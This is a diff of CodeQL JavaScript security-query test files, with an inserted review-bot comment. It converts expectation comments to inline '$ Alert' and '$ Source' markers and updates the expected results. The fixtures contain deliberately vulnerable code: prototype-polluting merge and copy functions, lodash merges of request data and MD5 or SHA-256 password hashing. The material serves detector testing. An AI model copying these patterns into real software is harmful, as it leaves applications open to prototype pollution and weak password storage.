@@ -181,7 +181,7 @@ function copyWithBlacklist(dst, src) { if (dst[key]) { copyWithBlacklist(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -189,11 +189,11 @@ function copyWithBlacklist(dst, src) { function copyUsingPlainForLoop(dst, src) { let keys = Object.keys(src); for (let i = 0; i < keys.length; ++i) { - let key = keys[i]; + let key = keys[i]; // $ Source if (dst[key]) { copyUsingPlainForLoop(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -205,7 +205,7 @@ function copyUsingPlainForLoopNoAlias(dst, src) { if (dst[key]) { copyUsingPlainForLoopNoAlias(dst[keys[i]], src[keys[i]]); } else { - dst[keys[i]] = src[keys[i]]; // NOT OK - but not flagged + dst[keys[i]] = src[keys[i]]; // $ MISSING: Alert } } } @@ -214,7 +214,7 @@ function deepSet(map, key1, key2, value) { if (!map[key1]) { map[key1] = Object.create(null); } - map[key1][key2] = value; // OK + map[key1][key2] = value; } function deepSetCaller(data) { @@ -230,12 +230,12 @@ function deepSetBad(map, key1, key2, value) { if (!map[key1]) { map[key1] = Object.create(null); } - map[key1][key2] = value; // NOT OK - object literal can flow here + map[key1][key2] = value; // $ Alert - object literal can flow here } function deepSetCallerBad(data) { let map1 = Object.create(null); - for (let key in data) { + for (let key in data) { // $ Source deepSetBad({}, key, 'x', data[key]); // oops deepSetBad(map1, 'x', key, data[key]); } @@ -254,7 +254,7 @@ function mergeWithCopy(dst, src) { let result = maybeCopy(dst); for (let key in src) { if (src.hasOwnProperty(key)) { - result[key] = mergeWithCopy(dst[key], src[key]); // OK + result[key] = mergeWithCopy(dst[key], src[key]); } } return result; 
@@ -262,22 +262,22 @@ function mergeWithCopy(dst, src) { function copyUsingEntries(dst, src) { Object.entries(src).forEach(entry => { - let key = entry[0]; + let key = entry[0]; // $ Source let value = entry[1]; if (dst[key]) { copyUsingEntries(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } function copyUsingReflect(dst, src) { - Reflect.ownKeys(src).forEach(key => { + Reflect.ownKeys(src).forEach(key => { // $ Source if (dst[key]) { copyUsingReflect(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } }); } @@ -290,7 +290,7 @@ function copyWithPath(dst, src, path) { } else { let target = {}; target[path] = {}; - target[path][key] = src[key]; // OK + target[path][key] = src[key]; doSomething(target); } } @@ -299,34 +299,34 @@ function copyWithPath(dst, src, path) { } function typeofObjectTest(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (src.hasOwnProperty(key)) { let value = src[key]; if (dst[key] && typeof value === 'object') { typeofObjectTest(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } } function mergeRephinementNode(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (src.hasOwnProperty(key)) { if (key === key && key === key) continue; // Create a phi-node of refinement nodes let value = src[key]; if (dst[key] && typeof value === 'object') { mergeRephinementNode(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } } function mergeSelective(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (src.hasOwnProperty(key)) { // Only 'prefs' is merged recursively if (key in dst && key !== 'prefs') { @@ -335,7 +335,7 @@ function mergeSelective(dst, src) { if (dst[key]) { mergeSelective(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; // $ Alert } } } 
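Review bot: In `mergeSelective` (tests.js, hunk `@@ -335,7 +335,7 @@`), the write `dst[key] = src[key]` was documented as `// OK` and is now annotated `// $ Alert`, which records it as an expected true positive. The old comment appears to rely on the guard `if (key in dst && key !== 'prefs')` in the preceding hunk; its body falls between the two hunks, so this is inferred. Other safe-but-flagged writes in this file are marked `// $ SPURIOUS: Alert`, for example in `mergePlainObjectsOnly` and `copyPlainObject`. If the query flags this line only because it cannot model that guard, annotate it as `dst[key] = src[key]; // $ SPURIOUS: Alert - guard on 'key in dst' not recognised as a barrier`, so the test keeps recording a known false positive rather than accepting it as correct. If the alert is intended, the `// Only 'prefs' is merged recursively` comment should explain why the write is still unsafe.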
@@ -347,14 +347,14 @@ function isNonArrayObject(item) { function mergePlainObjectsOnly(target, source) { if (isNonArrayObject(target) && isNonArrayObject(source)) { - Object.keys(source).forEach(key => { + Object.keys(source).forEach(key => { // $ Source if (key === '__proto__') { return; } if (isNonArrayObject(source[key]) && key in target) { target[key] = mergePlainObjectsOnly(target[key], source[key], options); } else { - target[key] = source[key]; // OK - but flagged anyway due to imprecise barrier for captured variable + target[key] = source[key]; // $ SPURIOUS: Alert - due to imprecise barrier for captured variable } }); } @@ -370,7 +370,7 @@ function mergePlainObjectsOnlyNoClosure(target, source) { if (isNonArrayObject(source[key]) && key in target) { target[key] = mergePlainObjectsOnlyNoClosure(target[key], source[key], options); } else { - target[key] = source[key]; // OK + target[key] = source[key]; } } } @@ -378,7 +378,7 @@ function mergePlainObjectsOnlyNoClosure(target, source) { } function forEachProp(obj, callback) { - for (let key in obj) { + for (let key in obj) { // $ Source if (obj.hasOwnProperty(key)) { callback(key, obj[key]); } @@ -390,7 +390,7 @@ function mergeUsingCallback(dst, src) { if (dst[key]) { mergeUsingCallback(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK - but not currently flagged + dst[key] = src[key]; // $ MISSING: Alert } }); } @@ -400,7 +400,7 @@ function mergeUsingCallback2(dst, src) { if (dst[key]) { mergeUsingCallback2(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -410,13 +410,13 @@ function wrappedRead(obj, key) { } function copyUsingWrappedRead(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source let value = wrappedRead(src, key); let target = wrappedRead(dst, key); if (target) { copyUsingWrappedRead(target, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } 
@@ -427,13 +427,13 @@ function almostSafeRead(obj, key) { } function copyUsingAlmostSafeRead(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source let value = almostSafeRead(src, key); let target = almostSafeRead(dst, key); if (target) { copyUsingAlmostSafeRead(target, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -450,43 +450,43 @@ function copyUsingSafeRead(dst, src) { if (target) { copyUsingSafeRead(target, value); } else { - dst[key] = value; // OK + dst[key] = value; } } } function copyUsingForOwn(dst, src) { let forOwn = import('for-own'); - forOwn(src, (value, key, o) => { + forOwn(src, (value, key, o) => { // $ Source if (dst[key]) { copyUsingForOwn(dst[key], src[key]); } else { // Handle a few different ways to access src[key] - if (something()) dst[key] = src[key]; // NOT OK - if (something()) dst[key] = o[key]; // NOT OK - if (something()) dst[key] = value; // NOT OK + if (something()) dst[key] = src[key]; // $ Alert + if (something()) dst[key] = o[key]; // $ Alert + if (something()) dst[key] = value; // $ Alert } }); } function copyUsingUnderscoreOrLodash(dst, src) { - _.each(src, (value, key, o) => { + _.each(src, (value, key, o) => { // $ Source if (dst[key]) { copyUsingUnderscoreOrLodash(dst[key], src[key]); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } let isPlainObject = require('is-plain-object'); function copyPlainObject(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (key === '__proto__') continue; if (dst[key] && isPlainObject(src)) { copyPlainObject(dst[key], src[key]); } else { - dst[key] = src[key]; // OK - but flagged anyway + dst[key] = src[key]; // $ SPURIOUS: Alert } } } @@ -499,7 +499,7 @@ function copyPlainObject2(dst, src) { if (isPlainObject(target) && isPlainObject(value)) { copyPlainObject2(target, value); } else { - dst[key] = value; // OK + dst[key] = value; } } } 
@@ -508,13 +508,13 @@ function copyPlainObject2(dst, src) { function usingDefineProperty(dst, src) { let keys = Object.keys(src); for (let i = 0; i < keys.length; ++i) { - let key = keys[i]; + let key = keys[i]; // $ Source if (dst[key]) { usingDefineProperty(dst[key], src[key]); } else { var descriptor = {}; descriptor.value = src[key]; - Object.defineProperty(dst, key, descriptor); // NOT OK + Object.defineProperty(dst, key, descriptor); // $ Alert } } } @@ -522,11 +522,11 @@ function usingDefineProperty(dst, src) { function copyUsingForInAndRest(...args) { const dst = args[0]; const src = args[1]; - for (let key in src) { + for (let key in src) { // $ Source if (dst[key]) { copyUsingForInAndRest(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -535,7 +535,7 @@ function forEachPropNoTempVar(obj, callback) { const keys = Object.keys(obj) const len = keys.length for (let i = 0; i < len; i++) { - callback(keys[i], obj[keys[i]]) + callback(keys[i], obj[keys[i]]) // $ Source } } @@ -544,7 +544,7 @@ function mergeUsingCallback3(dst, src) { if (dst[key]) { mergeUsingCallback3(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -556,7 +556,7 @@ function copyHasOwnProperty2(dst, src) { if (Object.hasOwn(dst, key)) { copyHasOwnProperty2(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -568,7 +568,7 @@ function copyHasOwnProperty3(dst, src) { if (_.has(dst, key)) { copyHasOwnProperty3(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } 
@@ -598,11 +598,11 @@ function captureBarrier(obj) { } function merge_captureBarrier(dest, source) { - for (const key of Object.keys(source)) { + for (const key of Object.keys(source)) { // $ Source if (dest[key]) { merge_captureBarrier(dest[key], source[key]); } else { - dest[key] = captureBarrier(source[key]); // OK - but currently flagged anyway + dest[key] = captureBarrier(source[key]); // $ SPURIOUS: Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.expected b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.expected index f687007db4dd..8b08f2a20afd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.expected +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.expected 
@@ -1,15 +1,46 @@ +#select +| angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | angularmerge.js:1:30:1:34 | event | angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | angularmerge.js:1:30:1:34 | event | user-controlled value | angularmerge.js:2:3:2:43 | angular ... .data)) | angular | +| src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | user-controlled value | src-vulnerable-lodash/package.json:3:19:3:26 | "4.17.4" | lodash | +| src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... e\\n } | src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... e\\n } | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | user-controlled value | src-vulnerable-lodash/package.json:3:19:3:26 | "4.17.4" | lodash | +| src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... g\\n } | src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... g\\n } | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | user-controlled value | src-vulnerable-lodash/package.json:3:19:3:26 | "4.17.4" | lodash | +| webix/webix.html:4:26:4:47 | JSON.pa ... t.data) | webix/webix.html:3:34:3:38 | event | webix/webix.html:4:26:4:47 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.html:3:34:3:38 | event | user-controlled value | webix/webix.html:4:9:4:48 | webix.e ... .data)) | webix | +| webix/webix.html:5:24:5:45 | JSON.pa ... 
t.data) | webix/webix.html:3:34:3:38 | event | webix/webix.html:5:24:5:45 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.html:3:34:3:38 | event | user-controlled value | webix/webix.html:5:9:5:46 | webix.c ... .data)) | webix | +| webix/webix.js:4:22:4:43 | JSON.pa ... t.data) | webix/webix.js:3:30:3:34 | event | webix/webix.js:4:22:4:43 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.js:3:30:3:34 | event | user-controlled value | webix/webix.js:4:5:4:44 | webix.e ... .data)) | webix | +| webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | webix/webix.js:3:30:3:34 | event | webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.js:3:30:3:34 | event | user-controlled value | webix/webix.js:5:5:5:42 | webix.c ... .data)) | webix | +edges +| angularmerge.js:1:30:1:34 | event | angularmerge.js:2:32:2:36 | event | provenance | | +| angularmerge.js:2:32:2:36 | event | angularmerge.js:2:32:2:41 | event.data | provenance | | +| angularmerge.js:2:32:2:41 | event.data | angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | provenance | Config | +| src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... e\\n } | provenance | | +| src-vulnerable-lodash/tst.js:14:9:16:5 | opts [thing] | src-vulnerable-lodash/tst.js:18:16:18:19 | opts [thing] | provenance | | +| src-vulnerable-lodash/tst.js:14:16:16:5 | {\\n ... e\\n } [thing] | src-vulnerable-lodash/tst.js:14:9:16:5 | opts [thing] | provenance | | +| src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | src-vulnerable-lodash/tst.js:14:16:16:5 | {\\n ... 
e\\n } [thing] | provenance | | +| src-vulnerable-lodash/tst.js:18:16:18:19 | opts [thing] | src-vulnerable-lodash/tst.js:18:16:18:25 | opts.thing | provenance | | +| src-vulnerable-lodash/tst.js:18:16:18:25 | opts.thing | src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... g\\n } | provenance | | +| webix/webix.html:3:34:3:38 | event | webix/webix.html:4:37:4:41 | event | provenance | | +| webix/webix.html:3:34:3:38 | event | webix/webix.html:5:35:5:39 | event | provenance | | +| webix/webix.html:4:37:4:41 | event | webix/webix.html:4:37:4:46 | event.data | provenance | | +| webix/webix.html:4:37:4:46 | event.data | webix/webix.html:4:26:4:47 | JSON.pa ... t.data) | provenance | Config | +| webix/webix.html:5:35:5:39 | event | webix/webix.html:5:35:5:44 | event.data | provenance | | +| webix/webix.html:5:35:5:44 | event.data | webix/webix.html:5:24:5:45 | JSON.pa ... t.data) | provenance | Config | +| webix/webix.js:3:30:3:34 | event | webix/webix.js:4:33:4:37 | event | provenance | | +| webix/webix.js:3:30:3:34 | event | webix/webix.js:5:31:5:35 | event | provenance | | +| webix/webix.js:4:33:4:37 | event | webix/webix.js:4:33:4:42 | event.data | provenance | | +| webix/webix.js:4:33:4:42 | event.data | webix/webix.js:4:22:4:43 | JSON.pa ... t.data) | provenance | Config | +| webix/webix.js:5:31:5:35 | event | webix/webix.js:5:31:5:40 | event.data | provenance | | +| webix/webix.js:5:31:5:40 | event.data | webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | provenance | Config | nodes | angularmerge.js:1:30:1:34 | event | semmle.label | event | | angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | semmle.label | JSON.pa ... t.data) | | angularmerge.js:2:32:2:36 | event | semmle.label | event | | angularmerge.js:2:32:2:41 | event.data | semmle.label | event.data | | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | semmle.label | req.query.foo | -| src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... K\\n } | semmle.label | {\\n ... 
K\\n } | +| src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... e\\n } | semmle.label | {\\n ... e\\n } | | src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | semmle.label | req.query.value | | src-vulnerable-lodash/tst.js:14:9:16:5 | opts [thing] | semmle.label | opts [thing] | | src-vulnerable-lodash/tst.js:14:16:16:5 | {\\n ... e\\n } [thing] | semmle.label | {\\n ... e\\n } [thing] | | src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | semmle.label | req.query.value | -| src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... K\\n } | semmle.label | {\\n ... K\\n } | +| src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... g\\n } | semmle.label | {\\n ... g\\n } | | src-vulnerable-lodash/tst.js:18:16:18:19 | opts [thing] | semmle.label | opts [thing] | | src-vulnerable-lodash/tst.js:18:16:18:25 | opts.thing | semmle.label | opts.thing | | webix/webix.html:3:34:3:38 | event | semmle.label | event | 
@@ -26,35 +57,4 @@ nodes | webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | semmle.label | JSON.pa ... t.data) | | webix/webix.js:5:31:5:35 | event | semmle.label | event | | webix/webix.js:5:31:5:40 | event.data | semmle.label | event.data | -edges -| angularmerge.js:1:30:1:34 | event | angularmerge.js:2:32:2:36 | event | provenance | | -| angularmerge.js:2:32:2:36 | event | angularmerge.js:2:32:2:41 | event.data | provenance | | -| angularmerge.js:2:32:2:41 | event.data | angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | provenance | Config | -| src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... K\\n } | provenance | | -| src-vulnerable-lodash/tst.js:14:9:16:5 | opts [thing] | src-vulnerable-lodash/tst.js:18:16:18:19 | opts [thing] | provenance | | -| src-vulnerable-lodash/tst.js:14:16:16:5 | {\\n ... e\\n } [thing] | src-vulnerable-lodash/tst.js:14:9:16:5 | opts [thing] | provenance | | -| src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | src-vulnerable-lodash/tst.js:14:16:16:5 | {\\n ... e\\n } [thing] | provenance | | -| src-vulnerable-lodash/tst.js:18:16:18:19 | opts [thing] | src-vulnerable-lodash/tst.js:18:16:18:25 | opts.thing | provenance | | -| src-vulnerable-lodash/tst.js:18:16:18:25 | opts.thing | src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... K\\n } | provenance | | -| webix/webix.html:3:34:3:38 | event | webix/webix.html:4:37:4:41 | event | provenance | | -| webix/webix.html:3:34:3:38 | event | webix/webix.html:5:35:5:39 | event | provenance | | -| webix/webix.html:4:37:4:41 | event | webix/webix.html:4:37:4:46 | event.data | provenance | | -| webix/webix.html:4:37:4:46 | event.data | webix/webix.html:4:26:4:47 | JSON.pa ... t.data) | provenance | Config | -| webix/webix.html:5:35:5:39 | event | webix/webix.html:5:35:5:44 | event.data | provenance | | -| webix/webix.html:5:35:5:44 | event.data | webix/webix.html:5:24:5:45 | JSON.pa ... 
t.data) | provenance | Config | -| webix/webix.js:3:30:3:34 | event | webix/webix.js:4:33:4:37 | event | provenance | | -| webix/webix.js:3:30:3:34 | event | webix/webix.js:5:31:5:35 | event | provenance | | -| webix/webix.js:4:33:4:37 | event | webix/webix.js:4:33:4:42 | event.data | provenance | | -| webix/webix.js:4:33:4:42 | event.data | webix/webix.js:4:22:4:43 | JSON.pa ... t.data) | provenance | Config | -| webix/webix.js:5:31:5:35 | event | webix/webix.js:5:31:5:40 | event.data | provenance | | -| webix/webix.js:5:31:5:40 | event.data | webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | provenance | Config | subpaths -#select -| angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | angularmerge.js:1:30:1:34 | event | angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | angularmerge.js:1:30:1:34 | event | user-controlled value | angularmerge.js:2:3:2:43 | angular ... .data)) | angular | -| src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | user-controlled value | src-vulnerable-lodash/package.json:3:19:3:26 | "4.17.4" | lodash | -| src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... K\\n } | src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... K\\n } | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | user-controlled value | src-vulnerable-lodash/package.json:3:19:3:26 | "4.17.4" | lodash | -| src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... K\\n } | src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... 
K\\n } | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | user-controlled value | src-vulnerable-lodash/package.json:3:19:3:26 | "4.17.4" | lodash | -| webix/webix.html:4:26:4:47 | JSON.pa ... t.data) | webix/webix.html:3:34:3:38 | event | webix/webix.html:4:26:4:47 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.html:3:34:3:38 | event | user-controlled value | webix/webix.html:4:9:4:48 | webix.e ... .data)) | webix | -| webix/webix.html:5:24:5:45 | JSON.pa ... t.data) | webix/webix.html:3:34:3:38 | event | webix/webix.html:5:24:5:45 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.html:3:34:3:38 | event | user-controlled value | webix/webix.html:5:9:5:46 | webix.c ... .data)) | webix | -| webix/webix.js:4:22:4:43 | JSON.pa ... t.data) | webix/webix.js:3:30:3:34 | event | webix/webix.js:4:22:4:43 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.js:3:30:3:34 | event | user-controlled value | webix/webix.js:4:5:4:44 | webix.e ... .data)) | webix | -| webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | webix/webix.js:3:30:3:34 | event | webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.js:3:30:3:34 | event | user-controlled value | webix/webix.js:5:5:5:42 | webix.c ... .data)) | webix | diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.qlref b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.qlref index c25a469a4d03..e2fd61cc5225 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.qlref 
+++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.qlref @@ -1 +1,2 @@ -Security/CWE-915/PrototypePollutingMergeCall.ql \ No newline at end of file +query: Security/CWE-915/PrototypePollutingMergeCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js index 041d9adf02fc..57e74adc18b2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js @@ -1,3 +1,3 @@ -addEventListener("message", (event) => { - angular.merge({}, JSON.parse(event.data)); // NOT OK +addEventListener("message", (event) => { // $ Source + angular.merge({}, JSON.parse(event.data)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js index ba7d026b9cd9..8e50da57e315 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js @@ -4,5 +4,5 @@ let _ = require('lodash'); let app = express(); app.get('/hello', function(req, res) { - _.merge({}, req.query.foo); // OK + _.merge({}, req.query.foo); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js index b1da6d9ab05d..270038961d19 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js @@ -4,17 +4,17 @@ let _ = require('lodash'); let app = express(); app.get('/hello', function(req, res) { - _.merge({}, req.query.foo); // NOT OK - _.merge({}, req.query); // NOT OK - but not flagged + _.merge({}, req.query.foo); // $ Alert + _.merge({}, req.query); // $ MISSING: Alert _.merge({}, { - value: req.query.value // NOT OK - }); + value: req.query.value // $ Source + }); // $ Alert let opts = { - thing: req.query.value // wrapped and unwrapped value + thing: req.query.value // $ Source - wrapped and unwrapped value }; _.merge({}, { - value: opts.thing // NOT OK - }); + value: opts.thing + }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html index 02d6d086d547..ccd317916100 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html @@ -1,7 +1,7 @@ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js index acbfa2acbb42..1b281d5250cc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js 
@@ -1,6 +1,6 @@ import * as webix from "webix"; -addEventListener("message", (event) => { - webix.extend({}, JSON.parse(event.data)); // NOT OK - webix.copy({}, JSON.parse(event.data)); // NOT OK +addEventListener("message", (event) => { // $ Source + webix.extend({}, JSON.parse(event.data)); // $ Alert + webix.copy({}, JSON.parse(event.data)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-916/InsufficientPasswordHash.qlref b/javascript/ql/test/query-tests/Security/CWE-916/InsufficientPasswordHash.qlref index 77fc8c3a1d2f..312cee377c3c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-916/InsufficientPasswordHash.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-916/InsufficientPasswordHash.qlref @@ -1 +1,2 @@ -Security/CWE-916/InsufficientPasswordHash.ql \ No newline at end of file +query: Security/CWE-916/InsufficientPasswordHash.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-916/tst.js b/javascript/ql/test/query-tests/Security/CWE-916/tst.js index c5f1c31127a8..d41c6b719a18 100644 --- a/javascript/ql/test/query-tests/Security/CWE-916/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-916/tst.js @@ -1,9 +1,9 @@ var password = "secret"; -require("bcrypt").hash(password); // OK +require("bcrypt").hash(password); -require('crypto').createCipher('aes192').write(password); // NOT OK +require('crypto').createCipher('aes192').write(password); // $ Alert -require('crypto').createHash('sha256').write(password); // NOT OK +require('crypto').createHash('sha256').write(password); // $ Alert -require('crypto').createHash('md5').write(password); // NOT OK +require('crypto').createHash('md5').write(password); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.expected b/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.expected index 5a267ea56891..4a8f524f8624 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.expected +++ b/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.expected @@ -1,3 +1,8 @@ +#select +| clientSide.js:12:5:12:55 | request ... '/id') | clientSide.js:11:19:11:40 | window. ... .search | clientSide.js:12:13:12:54 | 'https: ... + '/id' | The $@ of this request depends on a $@. | clientSide.js:12:13:12:54 | 'https: ... + '/id' | URL | clientSide.js:11:19:11:40 | window. ... .search | user-provided value | +| clientSide.js:14:5:14:64 | request ... search) | clientSide.js:14:42:14:63 | window. ... .search | clientSide.js:14:13:14:63 | 'https: ... .search | The $@ of this request depends on a $@. | clientSide.js:14:13:14:63 | 'https: ... .search | URL | clientSide.js:14:42:14:63 | window. ... .search | user-provided value | +| clientSide.js:17:5:17:58 | request ... '/id') | clientSide.js:16:22:16:41 | window.location.hash | clientSide.js:17:13:17:57 | 'https: ... + '/id' | The $@ of this request depends on a $@. | clientSide.js:17:13:17:57 | 'https: ... + '/id' | URL | clientSide.js:16:22:16:41 | window.location.hash | user-provided value | +| clientSide.js:21:5:21:54 | request ... '/id') | clientSide.js:20:18:20:28 | window.name | clientSide.js:21:13:21:53 | 'https: ... + '/id' | The $@ of this request depends on a $@. | 